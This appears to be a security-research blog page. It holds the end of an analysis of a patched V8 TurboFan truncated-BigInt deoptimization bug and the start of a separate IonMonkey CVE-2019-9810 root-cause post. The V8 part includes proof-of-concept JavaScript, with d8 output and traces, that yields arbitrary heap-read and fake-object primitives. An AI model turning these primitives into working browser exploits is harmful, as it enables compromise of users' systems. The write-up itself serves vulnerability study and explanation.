          Smi smi(static_cast<Address>(constant.ToInt64()));
          DCHECK(smi.IsSmi());
          literal = DeoptimizationLiteral(smi.value());
        }
        break;

This is very interesting because that means at runtime (when deoptimizing), the deoptimizer uses this pointer to rematerialize an object! But since this is a controlled value (the truncated big int), we can make the deoptimizer reference an arbitrary object and thus make the next ignition bytecode handler use (or not) this crafted reference.

In this case, we are playing with the accumulator register. Therefore, to find interesting primitives, what we need to do is to look for all the bytecode handlers that get the accumulator (using a GetAccumulator for instance).

Experiment 1 - reading an arbitrary heap number

The most obvious primitive is the one we get by deoptimizing to the ignition handler for add opcodes.

let addr = BigInt(0x11111111);

function setAddress(val) {
  addr = BigInt(val);
}

function f(x) {
  let y = BigInt.asUintN(49, addr);
  let a = 111;
  try {
    var res = 1.1 + y; // will trigger a deoptimization. reason : "Insufficient type feedback for binary operation"
    return res;
  }
  catch(_){ return y}
}

function compileOnce() {
  f({x:1.1});
  %PrepareFunctionForOptimization(f);
  f({x:1.1});
  %OptimizeFunctionOnNextCall(f);
  return f({x:1.1});
}

When reading the implementation of the handler (BinaryOpAssembler::Generate_AddWithFeedback in src/ic/bin-op-assembler.cc), we observe that for heap numbers additions, the code ends up calling the function LoadHeapNumberValue. In that case, it gets called with an arbitrary pointer.

To demonstrate the bug, we use the %DebugPrint runtime function to get the address of an object (simulate an infoleak primitive) and see that we indeed (incorrectly) read its value.

d8> var a = new Number(3.14); %DebugPrint(a)
0x025f585caa49 <Number map = 000000FB210820A1 value = 0x019d1cb1f631 <HeapNumber 3.14>>
3.14
d8> setAddress(0x025f585caa49)
undefined
d8> compileOnce()
4.24

We can get the same primitive using other kind of ignition bytecode handlers such as +, -,/,* or %.

--- var res = 1.1 + y;
+++ var res = y / 1;
d8> var a = new Number(3.14); %DebugPrint(a)
0x019ca5a8aa11 <Number map = 00000138F15420A1 value = 0x0168e8ddf611 <HeapNumber 3.14>>
3.14
d8> setAddress(0x019ca5a8aa11)
undefined
d8> compileOnce()
3.14

The --trace-ignition debugging utility can be interesting in this scenario. For instance, let's say we use a BigInt value of 0x4200000000 and instead of doing 1.1 + y we do y / 1. Then we want to trace it and confirm the behaviour that we expect.

The trace tells us :

  • a deoptimization was triggered and why (insufficient type feedback for binary operation, this binary operation being the division)
  • in the input frame, there is a register entry containing the bigint value thanks to (or because of) the incorrect lowering 11: 0x004200000000 ; rcx 66
  • in the translated interpreted frame the accumulator gets the value 0x004200000000 (<Smi 66>)
  • we deoptimize directly to the offset 39 which corresponds to DivSmi [1], [6]
[deoptimizing (DEOPT soft): begin 0x01b141c5f5f1 <JSFunction f (sfi = 000001B141C5F299)> (opt #0) @3, FP to SP delta: 40, caller sp: 0x0042f87fde08]
            ;;; deoptimize at <read_heap_number.js:11:17>, Insufficient type feedback for binary operation
  reading input frame f => bytecode_offset=39, args=2, height=8, retval=0(#0); inputs:
      0: 0x01b141c5f5f1 ;  [fp -  16]  0x01b141c5f5f1 <JSFunction f (sfi = 000001B141C5F299)>
      1: 0x03a35e2c1349 ;  [fp +  24]  0x03a35e2c1349 <JSGlobal Object>
      2: 0x03a35e2cb3b1 ;  [fp +  16]  0x03a35e2cb3b1 <Object map = 0000019FAF409DF1>
      3: 0x01b141c5f551 ;  [fp -  24]  0x01b141c5f551 <ScriptContext[5]>
      4: 0x03a35e2cb3d1 ; rdi 0x03a35e2cb3d1 <BigInt 283467841536>
      5: 0x00422b840df1 ; (literal  2) 0x00422b840df1 <Odd Oddball: optimized_out>
      6: 0x00422b840df1 ; (literal  2) 0x00422b840df1 <Odd Oddball: optimized_out>
      7: 0x01b141c5f551 ;  [fp -  24]  0x01b141c5f551 <ScriptContext[5]>
      8: 0x00422b840df1 ; (literal  2) 0x00422b840df1 <Odd Oddball: optimized_out>
      9: 0x00422b840df1 ; (literal  2) 0x00422b840df1 <Odd Oddball: optimized_out>
     10: 0x00422b840df1 ; (literal  2) 0x00422b840df1 <Odd Oddball: optimized_out>
     11: 0x004200000000 ; rcx 66
  translating interpreted frame f => bytecode_offset=39, height=64
    0x0042f87fde00: [top + 120] <- 0x03a35e2c1349 <JSGlobal Object> ;  stack parameter (input #1)
    0x0042f87fddf8: [top + 112] <- 0x03a35e2cb3b1 <Object map = 0000019FAF409DF1> ;  stack parameter (input #2)
    -------------------------
    0x0042f87fddf0: [top + 104] <- 0x7ffd93f64c1d ;  caller's pc
    0x0042f87fdde8: [top +  96] <- 0x0042f87fde38 ;  caller's fp
    0x0042f87fdde0: [top +  88] <- 0x01b141c5f551 <ScriptContext[5]> ;  context (input #3)
    0x0042f87fddd8: [top +  80] <- 0x01b141c5f5f1 <JSFunction f (sfi = 000001B141C5F299)> ;  function (input #0)
    0x0042f87fddd0: [top +  72] <- 0x01b141c5fa41 <BytecodeArray[61]> ;  bytecode array
    0x0042f87fddc8: [top +  64] <- 0x005c00000000 <Smi 92> ;  bytecode offset
    -------------------------
    0x0042f87fddc0: [top +  56] <- 0x03a35e2cb3d1 <BigInt 283467841536> ;  stack parameter (input #4)
    0x0042f87fddb8: [top +  48] <- 0x00422b840df1 <Odd Oddball: optimized_out> ;  stack parameter (input #5)
    0x0042f87fddb0: [top +  40] <- 0x00422b840df1 <Odd Oddball: optimized_out> ;  stack parameter (input #6)
    0x0042f87fdda8: [top +  32] <- 0x01b141c5f551 <ScriptContext[5]> ;  stack parameter (input #7)
    0x0042f87fdda0: [top +  24] <- 0x00422b840df1 <Odd Oddball: optimized_out> ;  stack parameter (input #8)
    0x0042f87fdd98: [top +  16] <- 0x00422b840df1 <Odd Oddball: optimized_out> ;  stack parameter (input #9)
    0x0042f87fdd90: [top +   8] <- 0x00422b840df1 <Odd Oddball: optimized_out> ;  stack parameter (input #10)
    0x0042f87fdd88: [top +   0] <- 0x004200000000 <Smi 66> ;  accumulator (input #11)
[deoptimizing (soft): end 0x01b141c5f5f1 <JSFunction f (sfi = 000001B141C5F299)> @3 => node=39, pc=0x7ffd93f65100, caller sp=0x0042f87fde08, took 2.328 ms]
 -> 000001B141C5FA9D @   39 : 43 01 06          DivSmi [1], [6]
      [ accumulator -> 66 ]
      [ accumulator <- 66 ]
 -> 000001B141C5FAA0 @   42 : 26 f9             Star r2
      [ accumulator -> 66 ]
      [          r2 <- 66 ]
 -> 000001B141C5FAA2 @   44 : a9                Return 
      [ accumulator -> 66 ]

Experiment 2 - getting an arbitrary object reference

This bug also gives a better, more powerful, primitive. Indeed, if instead of deoptimizing back to an add handler, we deoptimize to Builtins_StaKeyedPropertyHandler, we'll be able to store an arbitrary object reference in an object property. Therefore, if an attacker is also able to leverage an infoleak primitive, he would be able to craft any arbitrary object (these are sometimes referred to as addressof and fakeobj primitives) .

In order to deoptimize to this specific handler, aka deoptimize on obj[x] = y, we have to make this line do something that violates a speculation. If we repeatedly call the function f with the same property name, TurboFan will speculate that we're always gonna add the same property. Once the code is optimized, using a property with a different name will violate this assumption, call the deoptimizer and then redirect execution to the StaKeyedProperty handler.

let addr = BigInt(0x11111111);

function setAddress(val) {
  addr = BigInt(val);
}

function f(x) {
  let y = BigInt.asUintN(49, addr);
  let a = 111;
  try {
    var obj = {};
    obj[x] = y;
    return obj;
  }
  catch(_){ return y}
}

function compileOnce() {
  f("foo");
  %PrepareFunctionForOptimization(f);
  f("foo");
  f("foo");
  f("foo");
  f("foo");
  %OptimizeFunctionOnNextCall(f);
  f("foo");
  return f("boom"); // deopt reason : wrong name
}

To experiment, we simply simulate the infoleak primitive by simply using a runtime function %DebugPrint and adding an ArrayBuffer to the object. That should not be possible since the javascript code is actually adding a truncated BigInt.

d8> var a = new ArrayBuffer(8); %DebugPrint(a);
0x003d5ef8ab79 <ArrayBuffer map = 00000354B09C2191>
[object ArrayBuffer]
d8> setAddress(0x003d5ef8ab79)
undefined
d8> var badobj = compileOnce()
undefined
d8> %DebugPrint(badobj)
0x003d5ef8d159 <Object map = 00000354B09C9F81>
{boom: [object ArrayBuffer]}
d8> badobj.boom
[object ArrayBuffer]

Et voila! Sweet as!

Variants

We saw with the first commit that the pattern affected FrameState nodes but also StateValues nodes.

Another commit further fixed the exact same bug affecting ObjectState nodes.

From 3ce6be027562ff6641977d7c9caa530c74a279ac Mon Sep 17 00:00:00 2001
From: Nico Hartmann <[email protected]>
Date: Tue, 26 Nov 2019 13:17:45 +0100
Subject: [PATCH] [turbofan] Fixes crash caused by truncated bigint

Bug: chromium:1028191
Change-Id: Idfcd678b3826fb6238d10f1e4195b02be35c3010
Reviewed-on: https://chromium-review.googlesource.com/c/v8/v8/+/1936468
Commit-Queue: Nico Hartmann <[email protected]>
Reviewed-by: Georg Neis <[email protected]>
Cr-Commit-Position: refs/heads/master@{#65173}
---

diff --git a/src/compiler/simplified-lowering.cc b/src/compiler/simplified-lowering.cc
index 4c000af..f271469 100644
--- a/src/compiler/simplified-lowering.cc
+++ b/src/compiler/simplified-lowering.cc
@@ -1254,7 +1254,13 @@
   void VisitObjectState(Node* node) {
     if (propagate()) {
       for (int i = 0; i < node->InputCount(); i++) {
-        EnqueueInput(node, i, UseInfo::Any());
+        // TODO(nicohartmann): Remove, once the deoptimizer can rematerialize
+        // truncated BigInts.
+        if (TypeOf(node->InputAt(i)).Is(Type::BigInt())) {
+          EnqueueInput(node, i, UseInfo::AnyTagged());
+        } else {
+          EnqueueInput(node, i, UseInfo::Any());
+        }
       }
     } else if (lower()) {
       Zone* zone = jsgraph_->zone();
@@ -1265,6 +1271,11 @@
         Node* input = node->InputAt(i);
         (*types)[i] =
             DeoptMachineTypeOf(GetInfo(input)->representation(), TypeOf(input));
+        // TODO(nicohartmann): Remove, once the deoptimizer can rematerialize
+        // truncated BigInts.
+        if (TypeOf(node->InputAt(i)).Is(Type::BigInt())) {
+          ConvertInput(node, i, UseInfo::AnyTagged());
+        }
       }
       NodeProperties::ChangeOp(node, jsgraph_->common()->TypedObjectState(
                                          ObjectIdOf(node->op()), types));
diff --git a/test/mjsunit/regress/regress-1028191.js b/test/mjsunit/regress/regress-1028191.js
new file mode 100644
index 0000000..543028a
--- /dev/null
+++ b/test/mjsunit/regress/regress-1028191.js
@@ -0,0 +1,23 @@
+// Copyright 2019 the V8 project authors. All rights reserved.
+// Use of this source code is governed by a BSD-style license that can be
+// found in the LICENSE file.
+
+// Flags: --allow-natives-syntax
+
+"use strict";
+
+function f(a, b, c) {
+  let x = BigInt.asUintN(64, a + b);
+  try {
+    x + c;
+  } catch(_) {
+    eval();
+  }
+  return x;
+}
+
+%PrepareFunctionForOptimization(f);
+assertEquals(f(3n, 5n), 8n);
+assertEquals(f(8n, 12n), 20n);
+%OptimizeFunctionOnNextCall(f);
+assertEquals(f(2n, 3n), 5n);

Interestingly, other bugs in the representation changers got triggered by very similars PoCs. The fix simply adds a call to InsertConversion so as to insert a ChangeUint64ToBigInt node when necessary.

From 8aa588976a1c4e593f0074332f5b1f7020656350 Mon Sep 17 00:00:00 2001
From: Nico Hartmann <[email protected]>
Date: Thu, 12 Dec 2019 10:06:19 +0100
Subject: [PATCH] [turbofan] Fixes rematerialization of truncated BigInts

Bug: chromium:1029530
Change-Id: I12aa4c238387f6a47bf149fd1a136ea83c385f4b
Reviewed-on: https://chromium-review.googlesource.com/c/v8/v8/+/1962278
Auto-Submit: Nico Hartmann <[email protected]>
Commit-Queue: Georg Neis <[email protected]>
Reviewed-by: Georg Neis <[email protected]>
Cr-Commit-Position: refs/heads/master@{#65434}
---

diff --git a/src/compiler/representation-change.cc b/src/compiler/representation-change.cc
index 99b3d64..9478e15 100644
--- a/src/compiler/representation-change.cc
+++ b/src/compiler/representation-change.cc
@@ -175,6 +175,15 @@
     }
   }

+  // Rematerialize any truncated BigInt if user is not expecting a BigInt.
+  if (output_type.Is(Type::BigInt()) &&
+      output_rep == MachineRepresentation::kWord64 &&
+      use_info.type_check() != TypeCheckKind::kBigInt) {
+    node =
+        InsertConversion(node, simplified()->ChangeUint64ToBigInt(), use_node);
+    output_rep = MachineRepresentation::kTaggedPointer;
+  }
+
   switch (use_info.representation()) {
     case MachineRepresentation::kTaggedSigned:
       DCHECK(use_info.type_check() == TypeCheckKind::kNone ||
diff --git a/test/mjsunit/regress/regress-1029530.js b/test/mjsunit/regress/regress-1029530.js
new file mode 100644
index 0000000..918a9ec
--- /dev/null
+++ b/test/mjsunit/regress/regress-1029530.js
@@ -0,0 +1,40 @@
+// Copyright 2019 the V8 project authors. All rights reserved.
+// Use of this source code is governed by a BSD-style license that can be
+// found in the LICENSE file.
+
+// Flags: --allow-natives-syntax --interrupt-budget=1024
+
+{
+  function f() {
+    const b = BigInt.asUintN(4,3n);
+    let i = 0;
+    while(i < 1) {
+      i + 1;
+      i = b;
+    }
+  }
+
+  %PrepareFunctionForOptimization(f);
+  f();
+  f();
+  %OptimizeFunctionOnNextCall(f);
+  f();
+}
+
+
+{
+  function f() {
+    const b = BigInt.asUintN(4,10n);
+    let i = 0.1;
+    while(i < 1.8) {
+      i + 1;
+      i = b;
+    }
+  }
+
+  %PrepareFunctionForOptimization(f);
+  f();
+  f();
+  %OptimizeFunctionOnNextCall(f);
+  f();
+}

An inlining bug was also patched. Indeed, a call to BigInt.asUintN would get inlined even when no value argument is given (as in BigInt.asUintN(bits,no_value_argument_here)). Therefore a call to GetValueInput would be made on a non-existing input! The fix simply adds a check on the number of inputs.

Node* value = NodeProperties::GetValueInput(node, 3); // input 3 may not exist!

An interesting fact to point out is that none of those PoCs would actually correctly execute. They would trigger exceptions that need to get caught. This leads to interesting behaviours from TurboFan that optimizes 'invalid' code.

Digression on pointer compression

In our small experiments, we used standard tagged pointers. To distinguish small integers (Smis) from heap objects, V8 uses the lowest bit of an object address.

Up until V8 8.0, it looks like this :

Smi:                   [32 bits] [31 bits (unused)]  |  0
Strong HeapObject:                        [pointer]  | 01
Weak HeapObject:                          [pointer]  | 11

However, with V8 8.0 comes pointer compression. It is going to be shipped with the upcoming M80 stable release. Starting from this version, Smis and compressed pointers are stored as 32-bit values :

Smi:                                      [31 bits]  |  0
Strong HeapObject:                        [30 bits]  | 01
Weak HeapObject:                          [30 bits]  | 11

As described in the design document, a compressed pointer corresponds to the first 32-bits of a pointer to which we add a base address when decompressing.

Let's quickly have a look by inspecting the memory ourselves. Note that DebugPrint displays uncompressed pointers.

d8> var a = new Array(1,2,3,4)
undefined
d8> %DebugPrint(a)
DebugPrint: 0x16a4080c5f61: [JSArray]
 - map: 0x16a4082817e9 <Map(PACKED_SMI_ELEMENTS)> [FastProperties]
 - prototype: 0x16a408248f25 <JSArray[0]>
 - elements: 0x16a4080c5f71 <FixedArray[4]> [PACKED_SMI_ELEMENTS]
 - length: 4
 - properties: 0x16a4080406e1 <FixedArray[0]> {
    #length: 0x16a4081c015d <AccessorInfo> (const accessor descriptor)
 }
 - elements: 0x16a4080c5f71 <FixedArray[4]> {
           0: 1
           1: 2
           2: 3
           3: 4
 }

If we look in memory, we'll actually find compressed pointers, which are 32-bit values.

(lldb) x/10wx 0x16a4080c5f61-1
0x16a4080c5f60: 0x082817e9 0x080406e1 0x080c5f71 0x00000008
0x16a4080c5f70: 0x080404a9 0x00000008 0x00000002 0x00000004
0x16a4080c5f80: 0x00000006 0x00000008

To get the full address, we need to know the base.

(lldb) register read r13
     r13 = 0x000016a400000000

And we can manually uncompress a pointer by doing base+compressed_pointer (and obviously we substract 1 to untag the pointer).

(lldb) x/10wx $r13+0x080c5f71-1
0x16a4080c5f70: 0x080404a9 0x00000008 0x00000002 0x00000004
0x16a4080c5f80: 0x00000006 0x00000008 0x08040549 0x39dc599e
0x16a4080c5f90: 0x00000adc 0x7566280a

Because now on a 64-bit build Smis are on 32-bits with the lsb set to 0, we need to shift their values by one.

Also, raw pointers are supported. An example of raw pointer is the backing store pointer of an array buffer.

d8> var a = new ArrayBuffer(0x40); 
d8> var v = new Uint32Array(a);
d8> v[0] = 0x41414141
d8> %DebugPrint(a)
DebugPrint: 0x16a4080c7899: [JSArrayBuffer]
 - map: 0x16a408281181 <Map(HOLEY_ELEMENTS)> [FastProperties]
 - prototype: 0x16a4082476f5 <Object map = 0x16a4082811a9>
 - elements: 0x16a4080406e1 <FixedArray[0]> [HOLEY_ELEMENTS]
 - embedder fields: 2
 - backing_store: 0x107314fd0
 - byte_length: 64
 - detachable
 - properties: 0x16a4080406e1 <FixedArray[0]> {}
 - embedder fields = {
    0, aligned pointer: 0x0
    0, aligned pointer: 0x0
 }
(lldb) x/10wx 0x16a4080c7899-1
0x16a4080c7898: 0x08281181 0x080406e1 0x080406e1 0x00000040
0x16a4080c78a8: 0x00000000 0x07314fd0 0x00000001 0x00000002
0x16a4080c78b8: 0x00000000 0x00000000

We indeed find the full raw pointer in memory (raw | 00).

(lldb) x/2wx 0x0000000107314fd0
0x107314fd0: 0x41414141 0x00000000

Conclusion

We went through various components of V8 in this article such as Ignition, TurboFan's simplified lowering phase as well as how deoptimization works. Understanding this is interesting because it allows us to grasp the actual underlying root cause of the bug we studied. At first, the base trigger looks very simple but it actually involves quite a few interesting mechanisms.

However, even though this bug gives a very interesting primitive, unfortunately it does not provide any good infoleak primitive. Therefore, it would need to be combined with another bug (obviously, we don't want to use any kind of heap spraying).

Special thanks to my mates Axel Souchet, Dougall J, Bill K, yrp604 and Mark Dowd for reviewing this article and kudos to the V8 team for building such an amazing JavaScript engine!

Please feel free to contact me on twitter if you've got any feedback or question!

Also, my team at Trenchant aka Azimuth Security is hiring so don't hesitate to reach out if you're interested :) (DMs are open, otherwise jf at company dot com with company being azimuthsecurity)

References

Technical documents

Bugs

A journey into IonMonkey: root-causing CVE-2019-9810.

A journey into IonMonkey: root-causing CVE-2019-9810.

Introduction

In May, I wanted to play with BigInt and evaluate how I could use them for browser exploitation. The exploit I wrote for the blazefox relied on a Javascript library developed by @5aelo that allows code to manipulate 64-bit integers. Around the same time ZDI had released a PoC for CVE-2019-9810 which is an issue in IonMonkey (Mozilla's speculative JIT engine) that was discovered and used by the magicians Richard Zhu and Amat Cama during Pwn2Own2019 for compromising Mozilla's web-browser.

This was the perfect occasion to write an exploit and add BigInt support in my utility script. You can find the actual exploit on my github in the following repository: CVE-2019-9810.

Once I was done with it, I felt that it was also a great occasion to dive into Ion and get to know each other. The original exploit was written without understanding one bit of the root-cause of the issue and unwinding this sounded like a nice exercise. This is basically what this blogpost is about, me exploring Ion's code-base and investigating the root-cause of CVE-2019-9810.

The title of the issue "IonMonkey MArraySlice has incorrect alias information" sounds to suggest that the root of the issue concerns some alias information and the fix of the issue also points at Ion's AliasAnalysis optimization pass.

Before starting, if you guys want to follow the source-code at home without downloading the whole of Spidermonkey’s / Firefox’s source-code I have set-up the woboq code browser on an S3 bucket here: ff-woboq - just remember that the snapshot has the fix for the issue we are discussing. Last but not least, I've noticed that IonMonkey gets decent code-churn and as a result some of the functions I mention below can be appear with a slightly different name on the latest available version.

All right, buckle up and enjoy the read!

Table of contents:

Speculative optimizing JIT compiler

This part is not really meant to introduce what optimizing speculative JIT engines are in detail but instead giving you an idea of the problem they are trying to solve. On top of that, we want to introduce some background knowledge about Ion specifically that is required to be able to follow what is to come.

For the people that never heard about JIT (just-in-time) engines, this is a piece of software that is able to turn code that is managed code into native code as it runs. This has been historically used by interpreted languages to produce faster code as running assembly is faster than a software CPU running code. With that in mind, this is what the Javascript bytecode looks like in Spidermonkey:

js> function f(a, b) { return a+b; }
js> dis(f)
flags: CONSTRUCTOR
loc     op
-----   --
main:
00000:  getarg 0                        #
00003:  getarg 1                        #
00006:  add                             #
00007:  return                          #
00008:  retrval                         # !!! UNREACHABLE !!!

Source notes:
 ofs line    pc  delta desc     args
---- ---- ----- ------ -------- ------
  0:    1     0 [   0] colspan 19
  2:    1     0 [   0] step-sep
  3:    1     0 [   0] breakpoint
  4:    1     7 [   7] colspan 12
  6:    1     8 [   1] breakpoint

Now, generating assembly is one thing but the JIT engine can be more advanced and apply a bunch of program analysis to optimize the code even more. Imagine a loop that sums every item in an array and does nothing else. Well, the JIT engine might be able to prove that it is safe to not do any bounds check on the index in which case it can remove it. Another easy example to reason about is an object getting constructed in a loop body but doesn't depend on the loop itself at all. If the JIT engine can prove that the statement is actually an invariant, then why constructing it for every run of the loop body? In that case it makes sense for the optimizer to move the statement out of the loop to avoid the useless constructions. This is the optimized assembly generated by Ion for the same function than above:

0:000> u . l20
000003ad`d5d09231 cc              int     3
000003ad`d5d09232 8b442428        mov     eax,dword ptr [rsp+28h]
000003ad`d5d09236 8b4c2430        mov     ecx,dword ptr [rsp+30h]
000003ad`d5d0923a 03c1            add     eax,ecx
000003ad`d5d0923c 0f802f000000    jo      000003ad`d5d09271
000003ad`d5d09242 48b9000000000080f8ff mov rcx,0FFF8800000000000h
000003ad`d5d0924c 480bc8          or      rcx,rax
000003ad`d5d0924f c3              ret

000003ad`d5d09271 2bc1            sub     eax,ecx
000003ad`d5d09273 e900000000      jmp     000003ad`d5d09278
000003ad`d5d09278 6a0d            push    0Dh
000003ad`d5d0927a e900000000      jmp     000003ad`d5d0927f
000003ad`d5d0927f 6a00            push    0
000003ad`d5d09281 e99a6effff      jmp     000003ad`d5d00120 <- bailout

OK so this was for optimizing and JIT compiler, but what about speculative now? If you think about this for a minute or two though, in order to pull off the optimizations we talked about above, you also need a lot of information about the code you are analyzing. For example, you need to know the types of the object you are dealing with, and this information is hard to get in dynamically typed languages because by-design the type of a variable changes across the program execution. Now, obviously the engine cannot randomly speculates about types, instead what they usually do is introspect the program at runtime and observe what is going on. If this function has been invoked many times and everytime it only received integers, then the engine makes an educated guess and speculates that the function receives integers. As a result, the engine is going to optimize that function under this assumption. On top of optimizing the function it is going to insert a bunch of code that is only meant to ensure that the parameters are integers and not something else (in which case the generated code is not valid). Adding two integers is not the same as adding two strings together for example. So if the engine encounters a case where the speculation it made doesn't hold anymore, it can toss the code it generated and fall-back to executing (called a deoptimization bailout) the code back in the interpreter, resulting in a performance hit.

From bytecode to optimized assembly

As you can imagine, the process of analyzing the program as well as running a full optimization pipeline and generating native code is very costly. So at times, even though the interpreter is slower, the cost of JITing might not be worth it over just executing something in the interpreter. On the other hand, if you executed a function let's say a thousand times, the cost of JITing is probably gonna be offset over time by the performance gain of the optimized native code. To deal with this, Ion uses what it calls warm-up counters to identify hot code from cold code (which you can tweak with --ion-warmup-threshold passed to the shell).

  // Force how many invocation or loop iterations are needed before compiling
  // a function with the highest ionmonkey optimization level.
  // (i.e. OptimizationLevel_Normal)
  const char* forcedDefaultIonWarmUpThresholdEnv =
      "JIT_OPTION_forcedDefaultIonWarmUpThreshold";
  if (const char* env = getenv(forcedDefaultIonWarmUpThresholdEnv)) {
    Maybe<int> value = ParseInt(env);
    if (value.isSome()) {
      forcedDefaultIonWarmUpThreshold.emplace(value.ref());
    } else {
      Warn(forcedDefaultIonWarmUpThresholdEnv, env);
    }
  }

  // From the Javascript shell source-code
  int32_t warmUpThreshold = op.getIntOption("ion-warmup-threshold");
  if (warmUpThreshold >= 0) {
    jit::JitOptions.setCompilerWarmUpThreshold(warmUpThreshold);
  }

On top of all of the above, Spidermonkey uses another type of JIT engine that produces less optimized code but produces it at a lower cost. As a result, the engine has multiple options depending on the use case: it can run in interpreted mode, it can perform cheaper-but-slower JITing, or it can perform expensive-but-fast JITing. Note that this article only focuses Ion which is the fastest/most expensive tier of JIT in Spidermonkey.

Here is an overview of the whole pipeline (picture taken from Mozilla’s wiki):

ionmonkey overview

OK so in Spidermonkey the way it works is that the Javascript code is translated to an intermediate language that the interpreter executes. This bytecode enters Ion and Ion converts it to another representation which is the Middle-level Intermediate Representation (abbreviated MIR later) code. This is a pretty simple IR which uses Static Single Assignment and has about ~300 instructions. The MIR instructions are organized in basic-blocks and themselves form a control-flow graph.

Ion's optimization pipeline is composed of 29 steps: certain steps actually modifies the MIR graph by removing or shuffling nodes and others don't modify it at all (they just analyze it and produce results consumed by later passes). To debug Ion, I recommend to add the below to your mozconfig file:

ac_add_options --enable-jitspew

This basically turns on a bunch of macro in the Spidermonkey code-base that are used to spew debugging information on the standard output. The debugging infrastructure is not nearly as nice as Turbolizer but we will do with the tools we have. The JIT subsystem can define a number of channels where it can output spew and the user can turn on/off any of them. This is pretty useful if you want to debug a single optimization pass for example.

// New channels may be added below.
#define JITSPEW_CHANNEL_LIST(_)            \
  /* Information during sinking */         \
  _(Prune)                                 \
  /* Information during escape analysis */ \
  _(Escape)                                \
  /* Information during alias analysis */  \
  _(Alias)                                 \
  /* Information during alias analysis */  \
  _(AliasSummaries)                        \
  /* Information during GVN */             \
  _(GVN)                                   \
  /* Information during sincos */          \
  _(Sincos)                                \
  /* Information during sinking */         \
  _(Sink)                                  \
  /* Information during Range analysis */  \
  _(Range)                                 \
  /* Information during LICM */            \
  _(LICM)                                  \
  /* Info about fold linear constants */   \
  _(FLAC)                                  \
  /* Effective address analysis info */    \
  _(EAA)                                   \
  /* Information during regalloc */        \
  _(RegAlloc)                              \
  /* Information during inlining */        \
  _(Inlining)                              \
  /* Information during codegen */         \
  _(Codegen)                               \
  /* Debug info about safepoints */        \
  _(Safepoints)                            \
  /* Debug info about Pools*/              \
  _(Pools)                                 \
  /* Profiling-related information */      \
  _(Profiling)                             \
  /* Information of tracked opt strats */  \
  _(OptimizationTracking)                  \
  _(OptimizationTrackingExtended)          \
  /* Debug info about the I$ */            \
  _(CacheFlush)                            \
  /* Output a list of MIR expressions */   \
  _(MIRExpressions)                        \
  /* Print control flow graph */           \
  _(CFG)                                   \
                                           \
  /* BASELINE COMPILER SPEW */             \
                                           \
  /* Aborting Script Compilation. */       \
  _(BaselineAbort)                         \
  /* Script Compilation. */                \
  _(BaselineScripts)                       \
  /* Detailed op-specific spew. */         \
  _(BaselineOp)                            \
  /* Inline caches. */                     \
  _(BaselineIC)                            \
  /* Inline cache fallbacks. */            \
  _(BaselineICFallback)                    \
  /* OSR from Baseline => Ion. */          \
  _(BaselineOSR)                           \
  /* Bailouts. */                          \
  _(BaselineBailouts)                      \
  /* Debug Mode On Stack Recompile . */    \
  _(BaselineDebugModeOSR)                  \
                                           \
  /* ION COMPILER SPEW */                  \
                                           \
  /* Used to abort SSA construction */     \
  _(IonAbort)                              \
  /* Information about compiled scripts */ \
  _(IonScripts)                            \
  /* Info about failing to log script */   \
  _(IonSyncLogs)                           \
  /* Information during MIR building */    \
  _(IonMIR)                                \
  /* Information during bailouts */        \
  _(IonBailouts)                           \
  /* Information during OSI */             \
  _(IonInvalidate)                         \
  /* Debug info about snapshots */         \
  _(IonSnapshots)                          \
  /* Generated inline cache stubs */       \
  _(IonIC)
enum JitSpewChannel {
#define JITSPEW_CHANNEL(name) JitSpew_##name,
  JITSPEW_CHANNEL_LIST(JITSPEW_CHANNEL)
#undef JITSPEW_CHANNEL
      JitSpew_Terminator
};

In order to turn those channels you need to define an environment variable called IONFLAGS where you can specify a comma separated string with all the channels you want turned on: IONFLAGS=alias,alias-sum,gvn,bailouts,logs for example. Note that the actual channel names don’t quite match with the macros above and so you can find all the names below:

static void PrintHelpAndExit(int status = 0) {
  fflush(nullptr);
  printf(
      "\n"
      "usage: IONFLAGS=option,option,option,... where options can be:\n"
      "\n"
      "  aborts        Compilation abort messages\n"
      "  scripts       Compiled scripts\n"
      "  mir           MIR information\n"
      "  prune         Prune unused branches\n"
      "  escape        Escape analysis\n"
      "  alias         Alias analysis\n"
      "  alias-sum     Alias analysis: shows summaries for every block\n"
      "  gvn           Global Value Numbering\n"
      "  licm          Loop invariant code motion\n"
      "  flac          Fold linear arithmetic constants\n"
      "  eaa           Effective address analysis\n"
      "  sincos        Replace sin/cos by sincos\n"
      "  sink          Sink transformation\n"
      "  regalloc      Register allocation\n"
      "  inline        Inlining\n"
      "  snapshots     Snapshot information\n"
      "  codegen       Native code generation\n"
      "  bailouts      Bailouts\n"
      "  caches        Inline caches\n"
      "  osi           Invalidation\n"
      "  safepoints    Safepoints\n"
      "  pools         Literal Pools (ARM only for now)\n"
      "  cacheflush    Instruction Cache flushes (ARM only for now)\n"
      "  range         Range Analysis\n"
      "  logs          JSON visualization logging\n"
      "  logs-sync     Same as logs, but flushes between each pass (sync. "
      "compiled functions only).\n"
      "  profiling     Profiling-related information\n"
      "  trackopts     Optimization tracking information gathered by the "
      "Gecko profiler. "
      "(Note: call enableGeckoProfiling() in your script to enable it).\n"
      "  trackopts-ext Encoding information about optimization tracking\n"
      "  dump-mir-expr Dump the MIR expressions\n"
      "  cfg           Control flow graph generation\n"
      "  all           Everything\n"
      "\n"
      "  bl-aborts     Baseline compiler abort messages\n"
      "  bl-scripts    Baseline script-compilation\n"
      "  bl-op         Baseline compiler detailed op-specific messages\n"
      "  bl-ic         Baseline inline-cache messages\n"
      "  bl-ic-fb      Baseline IC fallback stub messages\n"
      "  bl-osr        Baseline IC OSR messages\n"
      "  bl-bails      Baseline bailouts\n"
      "  bl-dbg-osr    Baseline debug mode on stack recompile messages\n"
      "  bl-all        All baseline spew\n"
      "\n"
      "See also SPEW=help for information on the Structured Spewer."
      "\n");
  exit(status);
}

An important channel is logs which tells the compiler to output a ion.json file (in /tmp on Linux) which packs a ton of information that it gathered throughout the pipeline and optimization process. This file is meant to be loaded by another tool to provide a visualization of the MIR graph throughout the passes. You can find the original iongraph.py but I personally use ghetto-iongraph.py to directly render the graphviz graph into SVG in the browser whereas iongraph assumes graphviz is installed and outputs a single PNG file per pass. You can also toggle through all the pass directly from the browser which I find more convenient than navigating through a bunch of PNG files:

ghetto-iongraph

You can invoke it like this:

python c:\work\codes\ghetto-iongraph.py --js-path c:\work\codes\mozilla-central\obj-ff64-asan-fuzzing\dist\bin\js.exe --script-path %1 --overwrite

Reading MIR code is not too bad, you just have to know a few things:

  1. Every instruction is an object
  2. Each instruction can have operands that can be the result of a previous instruction
10 | add unbox8:Int32 unbox9:Int32 [int32]
